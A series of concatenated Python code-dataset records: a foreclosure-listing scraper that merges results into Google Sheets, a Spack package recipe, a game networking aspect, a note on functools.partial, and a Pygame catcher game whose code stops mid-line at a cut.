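# run the scraper synchronously; cmd is one pre-joined string (e.g. something like 'python shapiro.py Mecklenburg NC upcoming_sales'), hence shell=True\n    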
subprocess.call(cmd, shell=True)\n\n\ndef execute_scripts():\n    counties = ['Mecklenburg', 'Cabarrus', 'Union', 'Iredell']\n\n    for county in counties:\n        # SHAPIRO\n        execute_scraping_script(shapiro_file, county=county, state='NC', sales_type='upcoming_sales')\n\n        # SHAPIRO (SALES_HELD)\n        execute_scraping_script(shapiro_file, county=county, state='NC', sales_type='sales_held')\n\n        # BROCKANDSCOTT\n        execute_scraping_script(brockandscott_file, county=county, state='NC')\n\n        # HUTCHENSLAWFIRM\n        execute_scraping_script(hutchenslawfirm_file, county=county)\n\n\ndef prepare_new_records_for_concatenation(init_df, current_run_data_df):\n    init_df['Num'] = init_df['Num'].str.replace(' ', '')\n    logger.info(\"Found data from SpreadSheet with {} records\".format(len(init_df)))\n    if 'Flag' not in init_df.columns:\n        init_df['Flag'] = \"No\"\n    intersection_records = set(current_run_data_df['Num']).intersection(set(init_df['Num']))\n    new_records = set(current_run_data_df['Num']) - set(init_df['Num'])\n    set_flag = lambda x: 'Yes' if x['Num'] in intersection_records or \\\n        x['Num'] in new_records else \"No\" # x['Flag']\n\n    # ------------------------------------------\n    # SETUP NEW RECORDS DF\n    # ------------------------------------------\n    new_records_df = current_run_data_df[current_run_data_df['Num'].isin(new_records)]\n    # ADD EXTRA COLUMNS\n    new_records_df['Inserted Date'] = today_time\n    new_records_df['Updated Date'] = today_time\n    # result_df = result_df[final_columns].fillna('NA')\n    # new_records_df['Group'] = ''\n    # new_records_df['Rating'] = ''\n    new_records_df['BoA'] = new_records_df['Address'].apply(boa_substitute)\n    new_records_df['Zillow'] = new_records_df['Address'].apply(zillow_substitute)\n    new_records_df['Location'] = new_records_df['Address'].apply(map_substitute)\n    new_records_df[\"Flag\"] = \"Yes\"\n\n    # Add empty values to missing columns\n    missing_columns_from_result_df = set(init_df.columns) - set(new_records_df.columns)\n    for col in missing_columns_from_result_df:\n        new_records_df[col] = ''\n\n    # UPDATING INITIAL DF with updated data\n    try:\n        init_df = update_dfs(init_df, current_run_data_df, 'Num')\n    except Exception as e:\n        raise Exception(\"Unable to update existing data with current run data. 
Error:{}\".format(e))\n\n result_df = pd.concat([init_df, new_records_df])\n result_df['Flag'] = result_df.apply(set_flag, axis=1)\n return result_df\n\n\ndef reformat_shapiro_salesheld(shapiro_salesheld_dfs):\n if not shapiro_salesheld_dfs:\n return pd.DataFrame()\n shapiro_salesheld = pd.concat(shapiro_salesheld_dfs)\n shapiro_salesheld.fillna(\"\", inplace=True)\n shapiro_salesheld = shapiro_salesheld[shapiro_salesheld['Property County'] != 'NO MATCHES FOUND']\n # split Property County to two different columns\n shapiro_salesheld['county'], shapiro_salesheld['State'] = shapiro_salesheld['Property County'].str.split(', ').str\n shapiro_salesheld['Source'] = 'shapiro-salesheld'\n shapiro_salesheld['Upset Info'] = shapiro_salesheld['Last Upset'] + ';' + shapiro_salesheld['Sucessful Bidder']\n\n # rename columns\n columns_rename_shapiro = {'Case #': 'Num',\n 'High Bid': 'Price',\n 'Property Address': 'Address',\n 'Sale Date': 'Bid Date',\n }\n shapiro_salesheld.rename(columns=columns_rename_shapiro, inplace=True)\n shapiro_salesheld['Num'] = shapiro_salesheld['Num'].str.replace(' ', '')\n return shapiro_salesheld\n\n\ndef reformat_shapiro(shapiro_dfs):\n if not shapiro_dfs:\n return pd.DataFrame()\n shapiro = pd.concat(shapiro_dfs)\n shapiro.fillna(\"\", inplace=True)\n shapiro = shapiro[shapiro['Property County'] != 'NO MATCHES FOUND']\n # split Property County to two different columns\n shapiro['county'], shapiro['State'] = shapiro['Property County'].str.split(', ').str\n shapiro['Source'] = 'shapiro'\n # rename columns\n columns_rename_shapiro = {'Case #': 'Num',\n 'Open Bid': 'Price',\n 'Property Address': 'Address',\n 'Sale Date - Sale Time': 'Bid Date'}\n shapiro.rename(columns=columns_rename_shapiro, inplace=True)\n shapiro['Num'] = shapiro['Num'].str.replace(' ', '')\n return shapiro\n\n\ndef reformat_brockandscott(brockandscott_dfs):\n if not brockandscott_dfs:\n return pd.DataFrame()\n brockandscott = pd.concat(brockandscott_dfs)\n brockandscott.fillna(\"\", inplace=True)\n # remove extra spaces from Address\n brockandscott['Address'] = brockandscott['Address'].apply(remove_extra_spaces)\n brockandscott['Source'] = 'brockandscott'\n # rename columns\n columns_rename = {'Bid Amount': 'Price',\n 'Book Page': 'Misc-1',\n 'Case Number': 'Parcel Nu',\n 'County': 'county',\n 'Court SP#': 'Num',\n 'Sale Date & Time': 'Bid Date',\n 'State Code': 'State'}\n # after change of URL\n columns_rename = {'Opening Bid Amount': 'Price',\n 'Book Page': 'Misc-1',\n 'Case #': 'Parcel Nu',\n 'County': 'county',\n 'Court SP #': 'Num',\n 'Sale Date': 'Bid Date'}\n\n brockandscott.rename(columns=columns_rename, inplace=True)\n brockandscott['Num'] = brockandscott['Num'].str.replace(' ', '')\n return brockandscott\n\n\n# TODO: remove `No records to display` records\ndef reformat_hutchenslawfirm(hutchenslawfirm_dfs):\n if not hutchenslawfirm_dfs:\n return pd.DataFrame()\n # Formatting Hutchenslawfirm\n hutchenslawfirm = pd.concat(hutchenslawfirm_dfs)\n hutchenslawfirm.fillna(\"\", inplace=True)\n hutchenslawfirm['Source'] = 'hutchens'\n hutchenslawfirm['county'], hutchenslawfirm['State'] = hutchenslawfirm['County'].str.split(', ').str\n columns_rename = {'SP#': 'Num',\n # 'County': 'county',\n 'Sale Date': 'Bid Date',\n 'Deed of Trust Book/Page': 'Misc-1',\n 'Bid Amount': 'Price'}\n hutchenslawfirm['Address'] = hutchenslawfirm['Property Address'] + ' ' + hutchenslawfirm['Property CSZ']\n hutchenslawfirm.rename(columns=columns_rename, inplace=True)\n hutchenslawfirm['Num'] = 
hutchenslawfirm['Num'].str.replace(' ', '')\n return hutchenslawfirm\n\n\ndef drop_duplicates_nd_preserve_rest(df, key):\n '''\n to rename key with number of occurence in case of duplicate key having multiple values\n Eg:\n col1 col2 col3\n 1 ABC pra nav\n 2 BDE ran dom\n 3 ABC das ari **\n ->cosidering col1 as key: value in row 3 (ABC) is duplicate, but has different values for rest of the columns\n so we replace ABC with ABC_1\n :return: dataframe without duplicates\n '''\n # REMOVE DUPLICATE ROWS\n df = df.drop_duplicates()\n\n count_series = df.groupby(key).cumcount()\n count_series = count_series.replace(0, '').replace(1, '_1').astype(str)\n df[key] += count_series\n return df\n\n\ndef init_rent_dict_for_missing_address(address_series):\n rent_json_file = os.path.join(database_path, 'rent.json')\n rent_dict = load_json_or_create_if_empty(rent_json_file)\n for address in address_series:\n if address not in rent_dict:\n rent_dict[address] = {}\n dump_json(rent_json_file, rent_dict)\n return rent_dict\n\n\ndef set_rent_attributes(rent_dict, row_series, rent_attr):\n address = row_series['Address']\n error_field = 'Error'\n attr_value = row_series.get(rent_attr)\n if (not attr_value or attr_value is np.nan):\n attrs_from_json = rent_dict.get(address, {})\n error = attrs_from_json.get(error_field)\n if error:\n attr_value = 0 # \"Error: {}\".format(error)\n else:\n attr_value = attrs_from_json.get(rent_attr, '')\n\n return attr_value\n\n\ndef rent_attrs_series(rent_dict, row_series, rent_attrs):\n return pd.Series([set_rent_attributes(rent_dict, row_series, attr)\n for attr in rent_attrs])\n\n\ndef apply_excel_formula(df, formula):\n return df.apply(lambda x: formula.format(x.name + 1), axis=1)\n\n\ndef extract_dolar_value(string):\n match_obj = re.match(\".*?(\\$.*)\", string)\n if match_obj:\n return match_obj.group(1)\n return ''\n\n\n# TODO: DELETE `NO MATCHES FOUND` records\ndef main():\n # // execute all scraping sites and store in csv folder\n execute_scripts()\n\n # // if gdrive creds file is not present in home directory, copy it\n copy_gdrive_private_file()\n\n # // get all files list of those which were stored by executing scraping sites\n result_files = glob.glob(os.path.join(csv_path, '*'))\n result_files = [i for i in result_files if re.search('_' + today, i)]\n if not result_files:\n raise Exception(\"No Files found for {}\".format(today))\n res = dict()\n\n # // read all files and store them as dataframes\n for result in result_files:\n variable = os.path.splitext(os.path.basename(result))[0]\n try:\n res[variable] = pd.read_csv(result)\n except UnicodeDecodeError:\n res[variable] = pd.read_csv(result, encoding=\"ISO-8859-1\")\n except:\n pass\n\n # OBTAIN shapiro related files into one df and brockandscott into one\n brockandscott_dfs = []\n shapiro_dfs = []\n shapiro_salesheld_dfs = []\n\n hutchenslawfirm_dfs = []\n for filename, result_df in res.items():\n if filename.startswith('brockandscott'):\n brockandscott_dfs.append(result_df)\n elif filename.startswith('shapiro-salesheld'):\n shapiro_salesheld_dfs.append(result_df)\n elif filename.startswith('shapiro'):\n shapiro_dfs.append(result_df)\n elif filename.startswith('hutchenslawfirm'):\n hutchenslawfirm_dfs.append(result_df)\n\n # ------------------------------------------------------\n # Formatting brockandscott\n # ------------------------------------------------------\n brockandscott = reformat_brockandscott(brockandscott_dfs)\n\n # ------------------------------------------------------\n # Formatting Shapiro\n # 
------------------------------------------------------\n shapiro = reformat_shapiro(shapiro_dfs)\n shapiro_salesheld = reformat_shapiro_salesheld(shapiro_salesheld_dfs)\n\n # ------------------------------------------------------\n # Formatting Hutchenslawfirm\n # ------------------------------------------------------\n hutchenslawfirm = reformat_hutchenslawfirm(hutchenslawfirm_dfs)\n\n # ------------------------------------------------------\n # INTERMEDIATE FILE TO CSV\n # ------------------------------------------------------\n # brockandscott.to_csv(os.path.join('result','brockandscott.csv'))\n # shapiro.to_csv(os.path.join('result', 'shapiro.csv'))\n\n # ------------------------------------------------------\n # Concat Brockandscot and Shapiro current execution result\n # ------------------------------------------------------\n current_run_data_df = pd.concat([brockandscott, shapiro, shapiro_salesheld, hutchenslawfirm])\n current_run_data_df.fillna(\"\", inplace=True)\n preserve_columns_order = ['county', 'Bid Date', 'BidDate_Formatted',\n 'Price',\n 'State', 'Num', 'Parcel Nu',\n 'Address', 'Misc-1', 'Source',\n 'Group', 'Rating', 'BoA',\n 'Zillow', 'Location', 'Inserted Date',\n 'Updated Date', 'Flag'\n ]\n\n # ------------------------------------------------------\n # DOWNLOAD EXISTING SPREADSHEET DATA\n # ------------------------------------------------------\n logger.info(\"Trying to read data from GoogleSpreadSheet:{} sheet: {}\".format(spread_sheet_id, sheet_name))\n try:\n df2google = DF2GoogleSpreadSheet(spreadsheet=spread_sheet_id, sheetname=sheet_name)\n init_df = df2google.download()\n except Exception as e:\n raise Exception(\"Unable to download spreadsheet: {}\".format(e))\n\n # ------------------------------------------------------\n # If No data from Google spreadsheet, create empty dataframe\n # ------------------------------------------------------\n if init_df is None:\n init_df = pd.DataFrame(columns=preserve_columns_order)\n logger and logger.error(\"No data obtained from Google spreadsheet\")\n\n # ------------------------------------------------------\n # Move existing data to new sheet if new month starts\n # ------------------------------------------------------\n if datetime_today.day == 1 and datetime_today.hour < 1:\n new_sheet_name = 'Sheet_{}_{}'.format(datetime_today.month - 1, datetime_today.year)\n logger.info(\n \"New Month Started, moving existing data to new Sheet:{} and emptying existing data\".format(new_sheet_name))\n df2google.upload(init_df, new_sheet_name)\n init_df = pd.DataFrame(columns=preserve_columns_order)\n\n # ------------------------------------------------------\n # Drop duplciated from current df and init df\n # ------------------------------------------------------\n init_df = drop_duplicates_nd_preserve_rest(init_df, key='Num')\n current_run_data_df = drop_duplicates_nd_preserve_rest(current_run_data_df, key='Num')\n\n current_run_data_df.drop_duplicates(inplace=True)\n # ------------------------------------------------------\n # Concatenate New Data and Existing Data\n # ------------------------------------------------------\n result_df = prepare_new_records_for_concatenation(init_df, current_run_data_df)\n\n # SET INDEX\n try:\n result_df['BidDate_Formatted'] = result_df['Bid Date'].apply(parse_bid_date)\n result_df['BidDate_Formatted'] = pd.to_datetime(result_df['BidDate_Formatted'])\n result_df = result_df.sort_values('BidDate_Formatted')\n except:\n logger.info(\"Unable to sort by Bid Date\")\n\n # SET INDEX\n 
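# rebuild a 1-based index so the SN column set below lines up with spreadsheet row numbers\n    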
result_df.reset_index(drop=True, inplace=True)\n result_df.index += 1\n # result_df.index.name = 'SN'\n result_df['SN'] = result_df.index\n\n # ------------------------------------------------------\n # SET COLUMN ORDER\n # ------------------------------------------------------\n add_quotes_to_data = lambda x: \"'{}\".format(str(x).strip('\"').strip(\"'\"))\n for col in ['Bid Date', 'Updated Date', 'Inserted Date', 'BidDate_Formatted']:\n result_df[col] = result_df[col].apply(add_quotes_to_data)\n\n result_df = result_df[preserve_columns_order]\n result_df.fillna(\"\", inplace=True)\n\n # Reformat Price attribute\n # ------------------------------------------------------\n result_df['Price Formatted'] = result_df['Price'].apply(extract_dolar_value)\n\n # ------------------------------------------------------\n # UPDATE RENT ATTRIBUTES\n # ------------------------------------------------------\n # // update rents.json with empty dict for missing addresses\n rent_attrs = init_rent_dict_for_missing_address(result_df['Address'])\n\n # // update result_df with rent attributes based on addresses\n zillow_additional_attrs = ['Estimate Range', 'Estimate', 'Avg. Sales Price', 'Bedrooms',\n 'rentzestimate_amount', 'rentzestimate_last_updated',\n 'zestimate_valuation_range']\n result_df[zillow_additional_attrs] = result_df.apply(\n lambda row_series: rent_attrs_series(rent_attrs, row_series, zillow_additional_attrs),\n axis=1)\n\n # ------------------------------------------------------\n # UPDATE FORMULAS\n # ------------------------------------------------------\n for column_name, column_formula in formulas_dict.items():\n result_df[column_name] = apply_excel_formula(result_df, column_formula)\n\n # ------------------------------------------------------\n # ZILLOW Attributes\n # ------------------------------------------------------\n zillow_additional_attrs = ['bathrooms', 'zillow_bedrooms', 'home_size', 'home_type',\n 'property_size', 'tax_value', 'year_built', 'zestimate_amount',\n 'zestimate_valuationRange_low', 'zestimate_valuation_range_high']\n result_df[zillow_additional_attrs] = result_df.apply(\n lambda row_series: rent_attrs_series(rent_attrs, row_series, zillow_additional_attrs),\n axis=1)\n\n # ------------------------------------------------------\n # WRITE RESULT TO SPREADSHEET\n # ------------------------------------------------------\n logger.info(\n \"New result with {} records will be uploaded to SpreadSheet into Sheet:{}\".format(len(result_df), sheet_name))\n df2google.upload(result_df, sheet_name)\n logger.info(\"Upload Successful\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scrape_format.py","file_name":"scrape_format.py","file_ext":"py","file_size_in_byte":21143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"347790261","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. 
See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack.package import *\n\n\nclass Pbsuite(Package, SourceforgePackage):\n \"\"\"PBJelly is a highly automated pipeline that aligns long sequencing\n reads (such as PacBio RS reads or long 454 reads in fasta format)\n to high-confidence draft assembles.\"\"\"\n\n homepage = \"https://sourceforge.net/p/pb-jelly/wiki/Home/\"\n sourceforge_mirror_path = \"pb-jelly/PBSuite_15.8.24.tgz\"\n\n version(\"15.8.24\", sha256=\"1be082faa62cb3f701c78498db8544c844c3d6d3e3524fecf00a12e82a97e12b\")\n\n depends_on(\"blasr@1.3.1:\", type=\"run\")\n depends_on(\"python@2.7:\", type=\"run\")\n depends_on(\"py-networkx@1.1:\", type=\"run\")\n\n def install(self, spec, prefix):\n install_tree(\"pbsuite\", prefix.pbsuite)\n install_tree(\"bin\", prefix.bin)\n\n def setup_run_environment(self, env):\n env.prepend_path(\"PYTHONPATH\", self.prefix)\n","sub_path":"var/spack/repos/builtin/packages/pbsuite/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519107896","text":"import ogre.renderer.OGRE as ogre\r\nfrom aspect import Aspect\r\nfrom collections import deque\r\nimport time\r\nimport math\r\n\r\nclass Net(Aspect):\r\n def __init__(self, ent):\r\n Aspect.__init__(self,ent)\r\n \r\n def crosslink(self):\r\n self.netMgr = self.engine.netMgr\r\n \r\n def tick(self, dtime):\r\n if len(self.ent.updateQueue) >0: # handle served position, orientation\r\n self.statusData = self.ent.updateQueue.popleft() #get the latest throw out the rest\r\n self.ent.updateQueue.clear()\r\n \r\n self.ent.pos = self.statusData.pos \r\n self.ent.dir = self.statusData.dir \r\n self.ent.speed = self.statusData.speed\r\n self.ent.pitch = self.statusData.pitch \r\n self.ent.roll = self.statusData.roll\r\n self.ent.isReady = self.statusData.isReady\r\n\r\n\r\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9437822","text":"#! 
/usr/bin/env python3\n# coding:utf-8\n\n\"\"\"\n1 What Python calls a partial function is not the same as a partial function in the mathematical sense\n\n2 Take the int() function as an example: once the default parameter base is set, strings can be converted from base 2, 8, 10 or 16\n   e.g., int('12345',base=8)\n   >>>5349\n   int('12345',base=16)\n   >>>74565\n   If a large number of binary strings need to be converted, a conversion function can be defined:\n   def int2(x,base=2):\n       return int(x,base)\n\n   With partial there is no need to define int2() yourself; one can be created directly:\n   from functools import partial\n   int2 = partial(int,base=2)\n   int2('1000000')\n   >>>64\n   int2('1010101')\n   >>>85\n\n3 What partial does is fix certain parameters of a function (that is, set default values) and return a new function\nFormat: new_func = partial(func, default=xx)\n\n\"\"\"\n# Source code of Python's partial function:\ndef partial(func, *args, **keywords):\n    \"\"\"New function with partial application of the given arguments\n    and keywords.\n    \"\"\"\n    if hasattr(func, 'func'):\n        args = func.args + args\n        tmpkw = func.keywords.copy()\n        tmpkw.update(keywords)\n        keywords = tmpkw\n        del tmpkw\n        func = func.func\n\n    def newfunc(*fargs, **fkeywords):\n        newkeywords = keywords.copy()\n        newkeywords.update(fkeywords)\n        return func(*(args + fargs), **newkeywords)\n    newfunc.func = func\n    newfunc.args = args\n    newfunc.keywords = keywords\n    return newfunc\n","sub_path":"partial function/偏函数定义 partial function.py","file_name":"偏函数定义 partial function.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"311555752","text":"import sys\nimport pygame\nfrom .utils import percent_round_int\n\nfrom ple.games import base\nfrom ple.games.utils.udp_comm_sender_new import CommSender\nfrom ple.games.utils.lv_reader import LabviewReader\n# from PyQt5.QtCore import (pyqtSignal, pyqtSlot, QObject, QSettings, QThread)\nimport random\nimport time\nimport numpy as np\n\nclass Paddle(pygame.sprite.Sprite):\n\n    def __init__(self, speed, width, height, action_x_map_list,\n                 SCREEN_WIDTH, SCREEN_HEIGHT):\n        self.speed = speed\n        self.width = width\n\n        self.SCREEN_WIDTH = SCREEN_WIDTH\n        self.SCREEN_HEIGHT = SCREEN_HEIGHT\n        self.xCoor_list = action_x_map_list\n        self.vel = 0.0\n\n        pygame.sprite.Sprite.__init__(self)\n\n        image = pygame.Surface((width, height))\n        image.fill((0, 0, 0, 0))\n        image.set_colorkey((0, 0, 0))\n\n        pygame.draw.rect(\n            image,\n            (255, 255, 255),\n            (0, 0, width, height),\n            0\n        )\n\n        self.image = image\n        self.rect = self.image.get_rect()\n        self.rect.center = (\n            SCREEN_WIDTH / 2 - width / 2,\n            SCREEN_HEIGHT - height - 3)\n\n    # def update(self, dx, dt):\n    def update(self, target_x):\n        # !!!-- add your classification method here!--!!!\n        # if target_x > xx and target_x < yy:\n        #     res = x_all[0]\n        # ...\n        _, y = self.rect.center\n        n_x = self.xCoor_list[target_x - 1] - self.width / 2\n        # if n_x <= 0:\n        #     n_x = 0\n        #\n        # if n_x + self.width >= self.SCREEN_WIDTH:\n        #     n_x = self.SCREEN_WIDTH - self.width\n        self.rect.center = (n_x, y)\n\n    def draw(self, screen):\n        # screen.blit(self.image, self.rect.center)\n        pos = (self.rect.center[0] - self.width / 2, self.rect.center[1])\n        screen.blit(self.image, pos)\n\n    def set_paddle_x(self,pad_x):\n        y = 777\n        self.rect.center = (pad_x,y)\n        pass\n\nclass Fruit(pygame.sprite.Sprite):\n    def __init__(self, speed, width, height,\n                 gap,\n                 SCREEN_WIDTH, SCREEN_HEIGHT, rng,\n                 center_x,center_y):\n        self.speed = speed\n        self.width = width\n        self.height = height\n        self.init_x = 430\n        self.SCREEN_WIDTH = SCREEN_WIDTH\n        self.SCREEN_HEIGHT = SCREEN_HEIGHT\n        self.rng = rng\n\n        pygame.sprite.Sprite.__init__(self)\n\n        image = pygame.Surface((width, height + gap))\n        image.fill((0, 0, 0, 0))\n        image.set_colorkey((0, 0, 0))\n\n        pygame.draw.rect(\n            image,\n            (255, 120, 
120),\n (0, 0, width, height),\n 0\n )\n self.image = image\n self.rect = image.get_rect()\n self.rect.center = (center_x, center_y)\n\n def update(self, dt):\n x, y = self.rect.center\n n_y = int(y + self.speed * dt)\n\n self.rect.center = (x, n_y)\n\n\n def reset_auto(self, gap):\n x = self.rng.choice(\n range(\n self.width,\n self.SCREEN_WIDTH - self.width,\n 1\n )\n )\n\n y = self.height - gap\n # self.rng.choice(\n # range(\n # self.height,\n # # int(self.SCREEN_HEIGHT / 3),\n # 10,\n # self.height)\n # )\n self.rect.center = (x, -1 * y)\n\n def reset_manually(self, init_x, gap):\n x = init_x\n y = self.height - gap\n self.rect.center = (x, -1 * y)\n\n def set_fruit_fall_speed(self,fru_fall_speed):\n self.speed = fru_fall_speed\n # print(self.speed)\n\n def draw(self, screen):\n pos = (self.rect.center[0] - self.width / 2, self.rect.center[1])\n screen.blit(self.image, pos)\n # self.rect.center\n\nclass Catcher_Discrete(base.PyGameWrapper):\n \"\"\"\n Based on `Eder Santana`_'s game idea.\n\n .. _`Eder Santana`: https://github.com/EderSantana\n\n Parameters\n ----------\n width : int\n Screen width.\n\n height : int\n Screen height, recommended to be same dimension as width.\n\n init_lives : int (default: 3)\n The number lives the agent has.\n\n \"\"\"\n\n def __init__(self, width=860, height=860, init_lives=10000,\n action_num=8, udp_comm=True,fall_speed=0.0015,\n fruit0_init_x=10, fruit1_init_x=10,\n paddle_init_x=10, fruit_fall_speed=0.05):\n\n self.fruit0_init_x = fruit0_init_x\n self.fruit1_init_x = fruit1_init_x\n self.paddle_init_x = paddle_init_x\n self.fruit_fall_speed = fruit_fall_speed\n\n self.action_num = action_num\n actions = self._init__action_dict()\n base.PyGameWrapper.__init__(self, width, height, actions=actions)\n\n self.fruit_width = percent_round_int(width, 1)\n self.screen_width = width\n self.fruit_height = percent_round_int(height, 0.04)\n # self.fruit_gap = 0.2 * height\n # self.fruit_fall_speed = fall_speed * height\n self.fruit_fall_speed = fruit_fall_speed\n\n self.player_speed = 0.010 * width\n self.paddle_width = 20\n self.paddle_height = 20\n\n\n self._dx = 0.0\n self.last_action = None\n self.cur_action = None\n self.init_lives = init_lives\n self.action_x_map_list = self._action_map_x()\n # self.angle_speed = 90\n\n # # new Thread for fruits' position update\n # self.fruits_thread = QThread()\n # new pygame events\n self.CUR_ACTION = pygame.USEREVENT + 1\n self.LAST_ACTION = pygame.USEREVENT + 2\n\n self._udp_comm = udp_comm\n self.to_update_text = 0\n self.is_manual_reset = True\n self.is_random = False\n self.is_sequence = False\n self.seq_msg = \"0\"\n self.fruit_rand_next_pos = None\n self.fruit_offset = 80\n self.seq_i = 0\n self.is_simple_AI = False\n self.is_Q_learning_AI = False\n self.simple_AI_left_speed = 40\n self.simple_AI_right_speed = 40\n self.ai_light_command = \"\"\n self.random_num = 0\n self.counter_shape = 0\n\n self.isToLeft = False\n self.isToRight= False\n self.acce_a = 3\n self.acce_sec = 3\n\n self.is_RL_to_send = False\n self.is_RL_train = False\n self.is_RL_test = False\n self.left_shift_speed = 30\n self.right_shift_speed = 30\n self.is_simple_AI = False\n #draw the grid lines:\n # self.draw_grid()\n if self._udp_comm:\n # the addr is localhost and port is 5888\n self._sender = CommSender(\"localhost\", 5888)\n self._reader = LabviewReader()\n\n\n def _handle_player_events(self):\n self._dx = 0.0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == 
self.CUR_ACTION:\n self.cur_action = event.idx\n\n if event.type == self.LAST_ACTION:\n self.last_action = event.idx\n\n def _action_map_x(self):\n action_num = self.action_num\n action_xCoor = []\n # x_unit = self.width / (action_num * 2-1)\n x_unit = self.width / (action_num-1)\n # for i in range(0, action_num * 2-1, 2):\n action_xCoor.append(self.paddle_width/2)\n # print (self.paddle_width, self.width)\n for i in range(1, action_num):\n to_append = int(x_unit * i)\n if i == action_num - 1:\n to_append -= self.paddle_width / 2\n action_xCoor.append(to_append)\n # print (action_xCoor)\n return action_xCoor\n\n def _init__action_dict(self):\n actions = {}\n for i in range(self.action_num):\n tmp = {str(i + 1): i + 1}\n actions.update(tmp)\n return actions\n\n def init(self):\n self.score = 0\n self.lives = self.init_lives\n self.player = Paddle(self.player_speed, self.paddle_width,\n self.paddle_height, self.action_x_map_list,\n self.width, self.height)\n\n self.fruit0 = Fruit(self.fruit_fall_speed,\n self.fruit_width, self.fruit_height,\n 0,\n self.width, self.height, self.rng,-1,-1)\n\n self.fruit1 = Fruit(self.fruit_fall_speed,\n self.fruit_width, self.fruit_height,\n 0,\n self.width, self.height, self.rng,-1,-1)\n #\n # self.fruit2 = Fruit(self.fruit_fall_speed,\n # self.fruit_width, self.fruit_height,\n # 0,\n # self.width, self.height, self.rng)\n\n # self.gap = int(self.height/1.5)\n if self.is_manual_reset == True:\n self.fruit0.reset_manually(self.fruit0_init_x,0)\n self.fruit1.reset_manually(self.fruit1_init_x,0)\n else:\n self.fruit0.reset_auto(0)\n self.fruit1.reset_auto(0)\n # self.fruit1.reset_manually(self.fruit_init_x,self.gap)\n # self.fruit2.reset_manually(self.fruit_init_x,(self.gap)*2)\n\n #draw grid lines:\n # self.draw_grid()\n\n def getGameState(self):\n \"\"\"\n Gets a non-visual state representation of the game.\n\n Returns\n -------\n\n dict\n * player x position.\n * players velocity.\n * fruits x position.\n * fruits y position.\n\n See code for structure.\n\n \"\"\"\n state = {\n \"player_x\": self.player.rect.center[0],\n \"player_y\": self.player.rect.center[1],\n \"player_vel\": self.player.vel,\n \"fruit0_x\": self.fruit0.rect.center[0],\n \"fruit0_y\": self.fruit0.rect.center[1],\n \"to_update_text\": self.to_update_text,\n # \"fruit_rand_pos\": self.random_num\n \"fruit1_x\": self.fruit1.rect.center[0],\n \"fruit1_y\": self.fruit1.rect.center[1]\n # \"fruit2_x\": self.fruit2.rect.center[0],\n # \"fruit2_y\": self.fruit2.rect.center[1],\n }\n\n return state\n\n def getScore(self):\n return self.score\n\n def game_over(self):\n return self.lives == 0\n\n def step(self, dt):\n self.screen.fill((0, 0, 0))\n self._handle_player_events()\n\n self.score += self.rewards[\"tick\"]\n\n if self.fruit0.rect.center[1] >= self.height or self.fruit1.rect.center[1] >= self.height:\n self.score += self.rewards[\"positive\"]\n self.seq_i += 1\n self.random_num = random.randint(1, 3)\n #print(\"score: \", self.score)\n if self.is_manual_reset == True:\n self.fruit0.reset_manually(self.fruit0_init_x, 0)\n self.fruit1.reset_manually(self.fruit1_init_x, 0)\n else:\n self.fruit0.reset_auto(0)\n self.fruit1.reset_auto(0)\n\n #self.to_update_text = 1\n\n if pygame.sprite.collide_rect(self.player, self.fruit0) or pygame.sprite.collide_rect(self.player, self.fruit1):\n # print(ret)\n self.score += self.rewards[\"negative\"]\n self.lives -= 1\n self.seq_i += 1\n self.random_num = random.randint(1, 3)\n\n if self.is_manual_reset == True:\n 
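# initial spawn: both fruits start at their configured x positions, just above the visible screen\n            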
self.fruit0.reset_manually(self.fruit0_init_x, 0)\n self.fruit1.reset_manually(self.fruit1_init_x, 0)\n else:\n self.fruit0.reset_auto(0)\n self.fruit1.reset_auto(0)\n\n\n self.to_update_text = 1\n\n if any([self.cur_action == idx for idx in list(self.actions.values())]):\n self.player.update(self.cur_action)\n\n self.fruit0.update(dt)\n self.fruit1.update(dt)\n # self.fruit2.update(dt)\n\n if self.lives == 0:\n self.score += self.rewards[\"loss\"]\n\n self.player.draw(self.screen)\n self.fruit0.draw(self.screen)\n self.fruit1.draw(self.screen)\n self.draw_grid()\n\n if self.is_random == True:\n if self.random_num == 1: #left\n self.fruit0_init_x = -3 / 8 * self.screen_width\n self.fruit1_init_x = 7 / 8 * self.screen_width\n # self.fruit0.width = percent_round_int(self.screen_width, 0.5)\n # self.fruit0.fruit_width = percent_round_int(self.screen_width, 0.5)\n # self.reset_fruit_param(self.fruit_width)\n elif self.random_num == 2: #middle\n self.fruit0_init_x = -1 / 8 * self.screen_width\n self.fruit1_init_x = 9 / 8 * self.screen_width\n # self.fruit0.width = percent_round_int(self.screen_width, 0.25)\n # self.reset_fruit_param(self.fruit0.fruit_width)\n\n elif self.random_num == 3: #right\n self.fruit0_init_x = 1 / 8 * self.screen_width\n self.fruit1_init_x = 11 / 8 * self.screen_width\n # self.fruit0.width = percent_round_int(self.screen_width, 0.5)\n # self.reset_fruit_param(self.fruit0.fruit_width)\n\n if self.is_sequence == True:\n seq = self.seq_msg\n length = len(seq)\n if seq[self.seq_i] == \"0\" and self.seq_i < length:\n self.fruit_init_x = 215 + self.fruit_offset\n if seq[self.seq_i] == \"1\" and self.seq_i < length:\n self.fruit_init_x = 430\n if seq[self.seq_i] == \"2\" and self.seq_i < length:\n self.fruit_init_x = 645 - self.fruit_offset\n if self.seq_i == length-1:\n self.seq_i = 0\n\n if self.is_simple_AI == True:\n fruit_x = self.fruit0.rect.center[0]\n fruit_y = self.fruit0.rect.center[1]\n if fruit_x > 480 and fruit_y > 170 and fruit_y < 180:\n self.ai_light_command = \"left\"\n self._action_single_screen(self.simple_AI_left_speed, \"left\")\n elif fruit_x <= 480 and fruit_y > 170 and fruit_y < 180:\n self.ai_light_command = \"right\"\n self._action_single_screen(self.simple_AI_right_speed, 